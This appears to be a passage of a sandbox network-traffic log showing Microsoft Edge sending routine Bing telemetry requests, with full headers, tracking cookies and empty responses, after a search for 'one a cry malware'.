dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a96
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913b26
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a63
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:52 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199032.149146ca
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.PPT&DATA={%22S%22:546,%22E%22:1768,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.PPT&DATA={%22S%22:546,%22E%22:1768,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199033.14915112
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199030520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030584%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199030520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030584%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:54 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199034.14915adb
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 19758
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199037.149168e5
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 720
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
